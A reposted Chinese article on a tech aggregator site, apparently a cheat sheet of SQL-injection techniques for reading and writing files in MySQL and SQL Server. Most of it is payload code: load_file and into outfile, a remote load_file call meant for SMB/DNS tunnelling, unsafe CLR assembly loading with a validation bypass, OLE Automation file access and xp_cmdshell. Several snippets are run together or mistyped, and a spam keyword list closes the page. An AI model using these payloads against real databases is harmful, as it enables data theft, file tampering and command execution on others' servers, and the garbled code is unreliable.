千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 数据库 >

SQL注入中文件读写的方法有哪些

发表于:2025-11-14 作者:千家信息网编辑
千家信息网最后更新 2025年11月14日,这篇文章主要介绍了SQL注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。一、MySQL读文件常见的读文件,可以
千家信息网最后更新 2025年11月14日SQL注入中文件读写的方法有哪些

这篇文章主要介绍了SQL注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')select load_file(0x633a2f626f6f742e696e69)select load_file('//ecma.io/1.txt') # smb协议select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';alter assembly sqb add file from 'd:\1.txt'alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures sp_configure 'show advanced options',1;RECONFIGURE;sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1exec @ret = sp_onmethod @f, 'readline', @line outwhile(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

感谢你能够认真阅读完这篇文章,希望小编分享的"SQL注入中文件读写的方法有哪些"这篇文章对大家有帮助,同时也希望大家多多支持,关注行业资讯频道,更多相关知识等着你来学习!

很赞哦!
文件 篇文章 方法 二进制 方式 合法 有效 价值 兴趣 函数 同时 字符 字符串 常见 数据 数据库 更多 朋友 服务器 知识 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 oracle系统数据库表 计算机网络技术云安全技术方向 数据库应用技术课程介绍 网页可以放进服务器里吗 传输网络技术题目 游戏服务器备份时会断网吗 app访问相册上传服务器 什么是代理服务器地址 钱德勒网络安全 软件开发程序 信息安全 最新互联网科技爆点 coc无法连接服务器 数据库会话不关闭 组态王用的那种数据库 邮储软件开发中心有晚餐吗 网络安全嘛 筑牢防火墙做网络安全小卫士 网络安全如何防范恶意软件 网络技术岗 工作计划 哈密市清林互联网科技工作室 jstl标签操作数据库 钢材仓库数据库设计SQL 软件开发主要有那方便 高中网络安全与法律法规 服务器能用多久 北同网络安全黑板报 怎么创建数据库作为语料库 软件开发选哪个配置的mac 九台区网络技术服务欢迎来电 模拟交易软件开发

相关文章

0